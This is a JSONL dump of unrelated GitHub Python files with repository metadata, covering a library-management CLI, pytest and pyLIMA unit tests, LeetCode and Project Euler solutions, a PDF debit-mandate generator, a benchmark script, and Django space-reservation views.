print(\"############### Main Page ##############\\n\")\n print(\"1- Display books\")\n print(\"2- Search for a book\")\n print(\"3- Add a book\")\n print(\"4- Remove a book\")\n print(\"5- Members Section\")\n print(\"6- Exit\")\n\n\ndef get_key():\n key = int(input(\"Enter a key: \"))\n while not (1<=key<=6):\n key = int(input(\"Press a key:\"))\n \n return key\n\n\ndef display_books():\n\n print(\"#\"*50)\n\n for title in library.books:\n print(library.books[title])\n\n print(\"#\"*50)\n\ndef search_for_book():\n\n title = input(\"Enter the book title:\").title()\n if title in library.books:\n print(library.books[title])\n else:\n print(\"No results!\")\n\n\ndef add_book():\n title = input(\"Enter the book`s title:\").title()\n author = input(\"Enter the book`s author:\")\n publishing_date = input(\"Enter the book`s publishing_date:\")\n copies = int(input(\"Enter the number of copies:\"))\n while copies <= 0:\n copies = int(input(\"Enter a valid number\"))\n new_book = models.Book(title,author,publishing_date,library,copies)\n librarian.add_book(new_book)\n print(\"Done!\")\n\ndef remove_book():\n title = input(\"Enter the book`s title:\").title()\n if title not in library.books:\n print(\"this book does not exist!\")\n else:\n book = library.books[title]\n librarian.remove_book(book)\n print(\"Done!\")\n\n\ndef members_section():\n print(\"############## Members Section #############\")\n print(\"1- Display members\")\n print(\"2- add a member\")\n print(\"3- remove a member\")\n print(\"4- a member needs to borrow a book\")\n print(\"5- a member needs to return a book\")\n print(\"6- back to the main page\")\n\n\n\ndef display_members():\n\n print(\"#\"*50)\n\n for id in library.members:\n print(library.members[id])\n\n print(\"#\"*50)\n\n\ndef add_member():\n name = input(\"Enter the member`s name:\")\n email = input(\"Enter the member`s email:\")\n new_member = models.Member(name,email)\n librarian.add_member(new_member,library)\n print(\"Done!\")\n\n\ndef remove_member():\n id = int(input(\"Enter the member`s id:\"))\n if id not in library.members:\n print(\"This id does not exist\")\n else:\n member = library.members[id]\n librarian.remove_member(member,library)\n print(\"Done!\")\n\n\ndef borrow_book():\n id = int(input(\"Enter the member`s id:\"))\n if id not in library.members:\n print(\"This id does not exist!!\")\n else:\n title = input(\"Enter the book`s title:\").title()\n if title not in library.books:\n print(\"This book does not exist!!\")\n elif not library.books[title].isavailable:\n print(\"This book is not available now\")\n else:\n member = library.members[id]\n book = library.books[title]\n member.borrow(book)\n print(\"Done!\")\n\n\ndef return_book():\n id = int(input(\"Enter the member`s id:\"))\n if id not in library.members:\n print(\"This id does not exist!!\")\n else:\n member = library.members[id]\n title = input(\"Enter the book`s title:\").title()\n if title not in member.borrowed_books:\n print(\"This book has not been borrowed by this member.\")\n else:\n book = member.borrowed_books[title]\n member.return_book(book)\n print(\"Done!\")\ndef app():\n\n main_page()\n key = get_key()\n\n while True:\n\n if key == 6:\n print(\"Exiting...\")\n return False\n elif key == 1:\n display_books()\n elif key == 2:\n search_for_book()\n elif key == 3:\n add_book()\n elif key == 4:\n remove_book()\n\n while key == 5:\n members_section()\n k = get_key()\n\n if k == 1:\n display_members()\n elif k == 2:\n add_member()\n elif k == 3:\n remove_member()\n elif k == 4:\n borrow_book()\n elif k == 5:\n return_book()\n elif k == 6:\n break\n time.sleep(1)\n \n time.sleep(1)\n main_page()\n key = get_key()\n \n\napp()\n\n","repo_name":"mohamedAbdelaleem/Library-management-system","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20077193627","text":"from check_login import login_check\nimport pytest\nimport allure\ndatas = [{'input_x':'su','even_x':'kw','check':{'code':0,'msg':'百度搜索成功!'}},\n {'input_x':None,'even_x':'kw','check':{'code':0,'msg':'取值错误'}},\n {'input_x':'su','even_x':None,'check':{'code':0,'msg':'取值错误'}},\n {'input_x':'su','even_x':'qq','check':{'code':0,'msg':'百度搜索失败'}},\n {'input_x':'ww','even_x':'kw','check':{'code':0,'msg':'百度搜索失败'}}]\n\n@pytest.mark.usefixtures('head')\nclass SearchTest:\n @pytest.mark.parametrize('case',datas)\n def search(self,case):\n actual = login_check(case['input_x'],case['even_x'])\n assert actual == case['check']\n@allure.title('模块测试开始')\ndef test_module():\n print('测试会话开始')","repo_name":"Elt-wlj/learn","sub_path":"LogTest/testcase/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"553953665","text":"class Solution:\n def mincostTickets(self, days: List[int], cost: List[int]) -> int:\n n = len(days)\n dp = [0 for i in range(days[-1]+1)]\n \n \n for i in range(1,len(dp)):\n if i in days:\n dp[i] = min(dp[i-1]+cost[0],dp[max(i-7,0)]+cost[1],dp[max(i-30,0)]+cost[2])\n else:\n dp[i] = dp[i-1]\n \n print(dp)\n return dp[-1]","repo_name":"DhruvSrivastava-16/LEETCODE-PRACTISE-","sub_path":"983-minimum-cost-for-tickets/983-minimum-cost-for-tickets.py","file_name":"983-minimum-cost-for-tickets.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"40940768929","text":"\nimport os\nfrom fpdf import FPDF\nfrom datetime import datetime, timedelta\nfrom authsys_common.dates import add_month\nimport calendar\n\nMAX_X = 210\nMAX_Y = 297\n\ndef get_next_monday():\n today = datetime.now().replace(hour=0, minute=0, second=0)\n while today.weekday() != 0:\n today += timedelta(days=1)\n return today\n\ndef add_ending(day):\n if day in (1, 21):\n day = str(day) + 'st'\n elif day in (2, 22):\n day = str(day) + 'nd'\n else:\n day = str(day) + 'th'\n return day\n\ndef create_mandate(member_id, name, address, bank, branch_code, account_number, account_type,\n price, phone, charge_day):\n f = FPDF('P', 'mm', 'A4')\n f.add_page()\n pth = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'mandate3.png')\n f.image(pth, 0, 0, MAX_X, MAX_Y)\n f.set_font('Courier', '', 12)\n f.text(85, 68, name)\n f.text(33, 75, address)\n f.text(27, 81, bank)\n f.text(43, 88, branch_code)\n f.text(133, 88, account_number)\n if account_type != \"1\":\n f.line(45, 94.5, 80, 94.5)\n if account_type != \"2\":\n f.line(83, 94.5, 100, 94.5)\n if account_type != \"3\":\n f.line(101, 94.5, 125, 94.5)\n now = datetime.now()\n f.text(31, 101, \"R\" + str(price))\n f.text(86, 101, now.strftime(\"%d/%b/%Y\"))\n f.text(164, 101, phone)\n f.text(140, 122, now.strftime(\"%d/%b/%Y\"))\n\n # calculate detailed charges\n days_in_month = calendar.monthrange(now.year, now.month)[1]\n #price_per_day = price / days_in_month\n first_charge = price # price_per_day * (days_in_month - now.day)\n first_charge_day = datetime.now().replace(minute=0, hour=0, second=0, day=charge_day)\n if charge_day < datetime.now().day + 5:\n # should be always true\n # first_charge += price\n first_charge_day = add_month(first_charge_day)\n\n f.text(74, 146, \"R%.2f\" % first_charge)\n f.text(123, 146, first_charge_day.strftime(\"%d/%b/%Y\"))\n\n f.text(84, 151, \"R%.2f\" % price)\n f.text(122, 151, add_ending(charge_day))\n f.text(30, 160.5, add_ending(charge_day))\n\n f.text(30, 257, \"Cape Town\")\n f.text(75, 257, add_ending(now.day))\n f.text(100, 257, now.strftime(\"%B\"))\n f.text(60, 278.6, \"B11-\" + str(member_id))\n# f.set_font('Arial', '', 6)\n# f.text()\n \n return f.output(dest='S')\n\nif __name__ == '__main__':\n s = create_mandate(member_id=123, name='Maciej Fijalkowski', address=\"Pizdowo 16\",\n bank='First National Bank', branch_code='123456', account_number='4353234432',\n account_type=\"1\", price=450, phone=\"12334435\", charge_day=13)\n open(\"out.pdf\", \"w\").write(s)","repo_name":"fijal/authsys-common","sub_path":"authsys_common/mandate.py","file_name":"mandate.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15740684909","text":"import fast.fast as ft\nimport numpy as np\nimport time, json, cpuinfo\n\nlimit = 50000000 # Try to limit limit to 10 000 / 50 000\nsize = 5\nnpy = []\ncpu_list = []\ncpuEx_list = []\ngpu_list = []\n\ngpu = ft.gpu()\ncpu = ft.cpu()\n\n\nwhile(True):\n A = [x * 0.183736125 for x in range(0, size)]\n C = []\n\n start_time1 = time.perf_counter()\n C = np.multiply(A, A)\n time_taken1 = time.perf_counter() - start_time1\n npy.append(time_taken1)\n\n start_time2 = time.perf_counter()\n C = cpu.ExMul(A, A)\n time_taken2 = time.perf_counter() - start_time2\n cpuEx_list.append(time_taken2)\n\n start_time = time.perf_counter()\n C = cpu.mul(A, A, 0)\n time_taken = time.perf_counter() - start_time\n cpu_list.append(time_taken)\n\n start_time3 = time.perf_counter()\n C = gpu.mul(A, A)\n time_taken = time.perf_counter() - start_time3\n gpu_list.append(time_taken)\n\n print(\"Completed Test Number : {}\".format(size) )\n\n if size >= limit:\n break\n \n size = size * 10\n\n \nbnmk = dict()\nbnmk['Test'] = 'Python CXX Wrapper Benchmark'\nbnmk['CPU/GPU Used'] = cpuinfo.get_cpu_info()['brand'] \nbnmk['numpy'] = npy\nbnmk['cpu'] = cpu_list\nbnmk['cpuEx'] = cpuEx_list\nbnmk['gpu'] = gpu_list\n \njsonfile = 'wrapper_test_new.json'\n\nwith open(jsonfile, 'w') as json_file:\n json.dump(bnmk, json_file)\n\nprint(\"Benchmarking Complete!\")\n","repo_name":"Anand270294/Fast","sub_path":"Example/benchmarker.py","file_name":"benchmarker.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71805702966","text":"'''Variable Names\nA variable can have a short name (like x and y) or a more descriptive name (age, carname, total_volume). Rules for Python variables:\nA variable name must start with a letter or the underscore character\nA variable name cannot start with a number\nA variable name can only contain alpha-numeric characters and underscores (A-z, 0-9, and _ )\nVariable names are case-sensitive (age, Age and AGE are three different variables)'''\n\n\nmyvar = \"John\"\nmy_var = \"John\"\n_my_var = \"John\"\nmyVar = \"John\"\nMYVAR = \"John\"\nmyvar2 = \"John\"\n\nprint(myvar)\n\n'''\nIllegal variable names:\n2myvar = \"John\"\nmy-var = \"John\"\nmy var = \"John\"\n'''","repo_name":"ValentineFernandes/Python","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"20814864121","text":"\"\"\"Project Euler Problem 24 - Lexicographic permutations\"\"\"\n\n\ndef factorial(number):\n\t\"\"\" simple factorial function, can also use import math for math.factorial() for a faster built in function\n\n\t:param number: Int - the number we want to calculate the factorial of\n\t:return: Int - the final product\n\t\"\"\"\n\tproduct = 1\n\tfor each in range(1, number+1):\n\t\tproduct *= each\n\treturn product\n\n\ndef nth_permutation(objects, target):\n\t\"\"\" calculates the nth lexicographic permutation given a pre-ordered list of objects\n\n\t:param objects: List - a list of objects (hopefully ordered) we don't sort in function because it might be odd types\n\t:param target: int - the index target of all possible permutations in order\n\t:return: list/string - if function call is out of range return string, otherwise return list for the permutation\n\t\"\"\"\n\t# catch calls out of range of total number of permutations\n\tif target > factorial(len(objects)) or target < 1:\n\t\treturn \"out of range\"\n\tpermutation = []\n\t# while we have objects to choose from\n\twhile len(objects) > 0:\n\t\t# to figure out the first object slot, calculate how many permutations will pass per choice\n\t\tfactorial_num = factorial(len(objects)-1)\n\t\t# we want only the next lowest integer that will fit wholly, if we use floored division we\n\t\t# will get wrong results for divisions that result in whole number naturally\n\t\ti = target / factorial_num\n\t\t# if the float is a whole number subtract 1\n\t\tif i.is_integer():\n\t\t\ti = i-1\n\t\t# discard remainder\n\t\ti = int(i)\n\t\t# subtract skipped iterations from the target\n\t\ttarget -= i * factorial_num\n\t\t# append the object to the solution permutation and remove it before looping\n\t\tpermutation.append(objects[i])\n\t\tobjects.remove(objects[i])\n\treturn permutation\n\n\nif __name__ == \"__main__\":\n\tN = 1000000\n\tunique_objects = [_ for _ in range(10)]\n\tprint(f\"The {N}(th) lexicographic permutation of\", unique_objects.copy(), \"is\", nth_permutation(unique_objects, N))\n","repo_name":"HCrescent/Project-Euler","sub_path":"Python/001-050/alternate solutions/Problem 024-2.py","file_name":"Problem 024-2.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25028681941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 7 15:46:17 2015\n\n@author: ebachelet\n\"\"\"\nimport unittest.mock as mock\nimport numpy as np\nimport collections\nfrom collections import OrderedDict\n\nfrom pyLIMA import microlfits\nfrom pyLIMA import microlmodels\n\n\ndef _create_event():\n event = mock.MagicMock()\n event.telescopes = [mock.MagicMock()]\n event.telescopes[0].name = 'Test'\n event.telescopes[0].lightcurve_flux = np.random.random((100, 3))\n\n event.telescopes[0].lightcurve_magnitude = np.random.random((100, 3))\n event.telescopes[0].filter = 'I'\n event.telescopes[0].gamma = 0.5\n event.total_number_of_data_points.return_value = sum([len(i.lightcurve_flux) for i in event.telescopes])\n return event\n\n\ndef _create_model(kind):\n model = mock.MagicMock()\n model.parameters_guess = []\n model.parameters_boundaries = [[0, 100], [0, 1], [0, 300]]\n model.Jacobian_flag = 'Not OK'\n \n model_dictionnary = {'to': 0, 'uo': 1, 'tE': 2, 'fs_Test': 3, 'g_Test': 4}\n model.model_dictionnary = OrderedDict(\n sorted(model_dictionnary.items(), key=lambda x: x[1]))\n\n model.pyLIMA_standards_dictionnary = model.model_dictionnary\n model.compute_the_microlensing_model.return_value = np.random.random(100).tolist(), 0.0,0.0\n model.model_magnification.return_value = np.random.random(100).tolist()\n fancy_namedtuple = collections.namedtuple('Parameters', model.model_dictionnary.keys())\n model.pyLIMA_standard_parameters_to_fancy_parameters.return_value = fancy_namedtuple(10.0, 0.1, 20, 10, 5)\n model.model_type = kind\n model.model_Jacobian.return_value = np.random.random((100,6)).T\n model.derive_telescope_flux.return_value = 42, 69\n model.compute_pyLIMA_parameters.return_value = np.random.uniform(0,2,len(model.model_dictionnary.keys()))\n \n return model\n\n\ndef test_mlfit_PSPL_LM_without_guess():\n current_event = _create_event()\n model = model = microlmodels.create_model('PSPL',current_event)\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (3 + 2 * len(current_event.telescopes), 3 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 3 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_FSPL_LM_without_guess():\n current_event = _create_event()\n model = model = microlmodels.create_model('FSPL',current_event)\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (4 + 2 * len(current_event.telescopes), 4 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 4 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_DSPL_LM_without_guess():\n current_event = _create_event()\n \n model = model = microlmodels.create_model('DSPL',current_event)\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (6 + 2 * len(current_event.telescopes), 6 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 6 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_PSPL_LM_with_guess():\n current_event = _create_event()\n model = microlmodels.create_model('PSPL',current_event)\n\n model.parameters_guess = [10, 0.1, 20]\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (3 + 2 * len(current_event.telescopes), 3 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 3 + 2 * len(current_event.telescopes) + 1\n\ndef test_mlfit_FSPL_LM_with_guess():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n\n model.parameters_boundaries = [[0, 100], [0, 1], [0, 300], [0, 1]]\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (4 + 2 * len(current_event.telescopes), 4 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 4 + 2 * len(current_event.telescopes) + 1\n\n#def test_mlfit_PSPL_MCMC_with_guess():\n# current_event = _create_event()\n# model = _create_model('PSPL')\n \n# fit = microlfits.MLFits(current_event)\n# fit.mlfit(model, 'MCMC',flux_estimation_MCMC='polyfit')\n\n\n# assert fit.MCMC_chains.shape == (240000, 6)\n\n\ndef test_check_fit_bad_covariance():\n current_event = _create_event()\n model = _create_model('PSPL')\n fit = microlfits.MLFits(current_event)\n fit.fit_covariance = np.array([[-1.0, 0.0], [0.0, 0.0]])\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n\ndef test_check_fit_bad_rho():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n fit = microlfits.MLFits(current_event)\n fit.model = model\n fit.fit_results = [0.0, 0.0, 0.0, -1.0, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.8, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.05, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Good Fit'\n\n\ndef test_check_fit_source_flux():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = microlfits.MLFits(current_event)\n fit.model = model\n fit.fit_results = [0.0, 0.0, 0.0, 0.0, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Good Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.8, -1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n\ndef test_LM_Jacobian():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = microlfits.MLFits(current_event)\n fit.model = model\n\n to = 0.0\n uo = 0.1\n tE = 1.0\n rho = 0.26\n fs = 10\n g = 1.0\n\n parameters = [to, uo, tE, rho, fs, g]\n\n Jacobian = fit.LM_Jacobian(parameters)\n Jacobian = Jacobian.T\n assert Jacobian.shape == (6, len(current_event.telescopes[0].lightcurve_flux))\n\n\ndef test_chichi_telescopes():\n\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = microlfits.MLFits(current_event)\n fit.model = model\n\n to = 0.0\n uo = 0.1\n tE = 1.0\n rho = 0.26\n fs = 10\n g = 1.0\n\n parameters = [to, uo, tE, rho, fs, g]\n\n chichi_telescopes = fit.chichi_telescopes(parameters)\n chichi = sum(fit.residuals_LM(parameters)**2)\n\n assert len(chichi_telescopes) == 1\n assert np.allclose(chichi,chichi_telescopes[0])\n","repo_name":"caseylam/pyLIMA","sub_path":"pyLIMA/test/test_microlfits.py","file_name":"test_microlfits.py","file_ext":"py","file_size_in_byte":6620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"29556589473","text":"def main(n):\n if n <= 1:\n return n\n current = 0\n prev1 = 1\n prev2 = 0\n for i in range(2, n + 1):\n current = prev1 + prev2\n prev2 = prev1\n prev1 = current\n print(f\"Current: {current}. prev1: {prev1}. prev2: {prev2}.\")\n return current\n\n\nprint(f\"Recursion result: {main(n=10)}.\")\n\n\"\"\"\nOutput:\nCurrent: 1. prev1: 1. prev2: 1.\nCurrent: 2. prev1: 2. prev2: 1.\nCurrent: 3. prev1: 3. prev2: 2.\nCurrent: 5. prev1: 5. prev2: 3.\nCurrent: 8. prev1: 8. prev2: 5.\nCurrent: 13. prev1: 13. prev2: 8.\nCurrent: 21. prev1: 21. prev2: 13.\nCurrent: 34. prev1: 34. prev2: 21.\nCurrent: 55. prev1: 55. prev2: 34.\nRecursion result: 55.\n\nTime complexity: O(n)\nSpace complexity: O(1)\n\"\"\"\n","repo_name":"shafikshaon/python-data-structures-and-algorithms","sub_path":"leetcode/cards/recursion/fibonacci_number/iterartive_bottom_up.py","file_name":"iterartive_bottom_up.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23848011349","text":"'''\nCretae Data Frame Using Dictionary in python.\nDictionary is a (key-value) Pair Data Type in python.\n'''\n\nimport pandas as pd \n\ndict ={ 'Name':['john', 'joe', 'Alex', 'Iris', 'berry'],\n 'degree':['B.Sc', 'M.Sc', 'M.A', 'B.A', 'C.A'] }\n\ndf =pd.DataFrame(dict)\nprint(df)","repo_name":"codeperfectplus/Pythonite","sub_path":"Pandas/creating pandas dataframe from list using dictionary.py","file_name":"creating pandas dataframe from list using dictionary.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"25673891896","text":"from django.db import IntegrityError\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom commons.views import handler_500_view\nfrom reservations.models import Term, Space, Reservation\nfrom users.models import PermissionTag\nfrom users.views import ManagerOnlyView, MemberOnlyView\n\n\nclass TermListView(ManagerOnlyView):\n \"\"\"\n 그룹에 등록된 약관 목록을 조회하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n registered_terms = self.group.registered_terms.all()\n self.context['registered_terms'] = registered_terms\n\n return render(request, 'reservations/term_list.html', self.context)\n\n\nclass TermCreateView(ManagerOnlyView):\n \"\"\"\n 약관 생성을 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n return render(request, 'reservations/term_create.html', self.context)\n\n def post(self, request, *args, **kwargs):\n title = request.POST['title']\n body = request.POST['body']\n\n new_term = Term.create_term(group=self.group, title=title, body=body)\n\n return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass TermDeleteView(ManagerOnlyView, Term.FindingSingleInstance):\n \"\"\"\n 약관 삭제를 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_term(request, *args, **kwargs)\n self.term.delete()\n return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass TermUpdateView(ManagerOnlyView, Term.FindingSingleInstance):\n \"\"\"\n 약관 갱신을 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_term(request, *args, **kwargs)\n return render(request, 'reservations/term_update.html', self.context)\n\n def post(self, request, *args, **kwargs):\n self.init_term(request, *args, **kwargs)\n\n new_title = request.POST['title']\n new_body = request.POST['body']\n\n self.term.update(title=new_title, body=new_body)\n\n return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass SpaceListView(MemberOnlyView):\n \"\"\"\n 그룹에 등록된 공간 목록을 보여주는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n return render(request, 'reservations/space_list.html', self.context)\n\n\nclass SpaceDetailView(MemberOnlyView, Space.FindingSingleInstance):\n \"\"\"\n 그룹에 등록된 공간의 세부 정보 및 예약 정보를 보여주는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n\n year = request.GET.get('year')\n month = request.GET.get('month')\n day = request.GET.get('day')\n\n target_day = Reservation.get_datetime(year, month, day)\n if target_day is None:\n raise Http404()\n\n # target_day가 포함된 주의 reservation instance들을 날짜별, 시간별로 정리\n reservation_of_week = Reservation.get_reservation_of_week(target_day, self.space)\n\n # 이하 Page rendering에 필요 ==========================================\n self.context['reservation_of_week'] = reservation_of_week\n self.context['hour_24'] = list(range(24))\n self.context['weekday_7'] = list(range(7))\n\n time_index = [\n ('AM' if i < 12 else 'PM') +\n '{:0>2s}'.format(str(i if i <= 12 else i % 12)) + ':00' for i in range(24)\n ]\n self.context['time_index'] = time_index\n\n monday = target_day - timezone.timedelta(days=target_day.weekday())\n sunday = monday + timezone.timedelta(days=7)\n self.context['monday'] = monday\n self.context['sunday'] = sunday\n self.context['monday_dt'] = monday.strftime('%Y/%m/%d')\n self.context['sunday_dt'] = sunday.strftime('%Y/%m/%d')\n\n prev_monday = monday - timezone.timedelta(days=7)\n self.context[\n 'prev_monday_querystring'] = f\"year={prev_monday.year}&month={prev_monday.month}&day={prev_monday.day}\"\n next_monday = monday + timezone.timedelta(days=7)\n self.context[\n 'next_monday_querystring'] = f\"year={next_monday.year}&month={next_monday.month}&day={next_monday.day}\"\n\n today = timezone.now()\n self.context['today_querystring'] = f\"year={today.year}&month={today.month}&day={today.day}\"\n # 이상 Page rendering에 필요 ==========================================\n\n return render(request, 'reservations/space_detail.html', self.context)\n\n\nclass SpaceCreateView(ManagerOnlyView):\n \"\"\"\n 공간 생성을 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n terms = self.group.registered_terms.all()\n self.context['terms'] = terms\n\n permission_tags = self.group.registered_permission_tags.all()\n self.context['permission_tags'] = permission_tags\n\n return render(request, 'reservations/space_create.html', self.context)\n\n def post(self, request, *args, **kwargs):\n term_pk = int(request.POST['term'])\n permission_pk = int(request.POST['permission'])\n name = request.POST['name']\n\n if term_pk != -1:\n term = get_object_or_404(Term, pk=term_pk)\n else:\n term = None\n\n if permission_pk != -1:\n permission_tag = get_object_or_404(PermissionTag, pk=permission_pk)\n else:\n permission_tag = None\n\n new_space = Space.create_space(group=self.group, term=term, name=name,\n required_permission=permission_tag)\n\n return redirect('reservations:space_list', group_pk=self.group.pk)\n\n\nclass SpaceUpdateView(ManagerOnlyView, Space.FindingSingleInstance):\n \"\"\"\n 공간에 대한 정보의 갱신을 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n\n terms = self.group.registered_terms.all()\n self.context['terms'] = terms\n self.context['current_term'] = self.space.term\n\n permission_tags = self.group.registered_permission_tags.all()\n self.context['permission_tags'] = permission_tags\n self.context['current_permission_tag'] = self.space.required_permission\n\n return render(request, 'reservations/space_update.html', self.context)\n\n def post(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n\n term_pk = int(request.POST['term'])\n permission_pk = int(request.POST['permission'])\n new_name = request.POST['name']\n\n if term_pk != -1:\n new_term = get_object_or_404(Term, pk=term_pk)\n else:\n new_term = None\n\n if permission_pk != -1:\n new_permission_tag = get_object_or_404(PermissionTag, pk=permission_pk)\n else:\n new_permission_tag = None\n\n self.space.update(name=new_name, term=new_term, required_permission=new_permission_tag)\n\n return redirect('reservations:space_detail', group_pk=self.group.pk, space_pk=self.space.pk)\n\n\nclass SpaceDeleteView(ManagerOnlyView, Space.FindingSingleInstance):\n \"\"\"\n 공간 삭제를 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n self.space.delete()\n return redirect('reservations:space_list', group_pk=self.group.pk)\n\n\nclass CreateReservationView(MemberOnlyView, Space.FindingSingleInstance):\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n self.context['blocked'] = False\n self.context['permission_rejected'] = False\n\n valid_blocks = request.user.get_valid_blocks_in_group(self.group)\n # 현재 사용 제한이 걸린 경우\n if valid_blocks:\n self.context['blocked'] = True\n self.context['valid_blocks'] = valid_blocks\n return render(request, 'reservations/reservation_create.html', self.context)\n # 사용 권한이 만족되지 않은 경우\n elif not Space.permission_checker.check(self.space, request.user):\n self.context['permission_rejected'] = True\n return render(request, 'reservations/reservation_create.html', self.context)\n\n # 월요일, 그리고 월요일부터 몇일 만큼 떨어진 요일인지를 기준으로 time table을 렌더링함\n monday_year = request.GET.get('monday_year')\n monday_month = request.GET.get('monday_month')\n monday_day = request.GET.get('monday_day')\n wd = int(request.GET.get('wd', 0))\n hour = request.GET.get('hour')\n\n target_monday = Reservation.get_datetime(monday_year, monday_month, monday_day)\n if target_monday is None:\n raise Http404()\n target_day = target_monday + timezone.timedelta(days=wd)\n\n try:\n hour = int(hour)\n if hour < 0:\n raise Exception\n except Exception:\n return handler_500_view(request, *args, **kwargs)\n\n target_dt = target_day.replace(hour=hour, minute=0, second=0, microsecond=0)\n # 이미 예약되어 있는 경우\n if Reservation.already_booked(space=self.space, target_dt=target_dt) or kwargs.get('already_booked'):\n self.context['already_booked'] = True\n else:\n self.context['already_booked'] = False\n\n self.context['reservation_year'] = target_dt.year\n self.context['reservation_month'] = target_dt.month\n self.context['reservation_day'] = target_dt.day\n self.context['reservation_hour'] = hour\n self.context['reservation_weekday'] = '월화수목금토일'[target_dt.weekday()]\n\n return render(request, 'reservations/reservation_create.html', self.context)\n\n def post(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n\n year = int(request.POST.get('year'))\n month = int(request.POST.get('month'))\n day = int(request.POST.get('day'))\n hour = int(request.POST.get('hour'))\n\n # 이미 예약되어 있는 경우\n target_dt = timezone.datetime(year, month, day, hour)\n try:\n new_reservation = Reservation.create_reservation(space=self.space, member=request.user, target_dt=target_dt)\n except IntegrityError:\n kwargs['already_booked'] = True\n return self.get(request, *args, **kwargs)\n # 정상 예약\n else:\n return redirect('reservations:reservation_detail',\n group_pk=self.group.pk, space_pk=self.space.pk, reservation_pk=new_reservation.pk)\n\n\nclass ReservationDetailView(MemberOnlyView, Space.FindingSingleInstance, Reservation.FindingSingleInstance):\n \"\"\"\n 예약 한 건에 대한 상세 정보 조회를 수행하는 View\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n self.init_reservation(request, *args, **kwargs)\n return render(request, 'reservations/reservation_detail.html', self.context)\n\n\nclass ReservationDeleteView(MemberOnlyView, Space.FindingSingleInstance):\n \"\"\"\n 예약 삭제를 수행하는 View\n 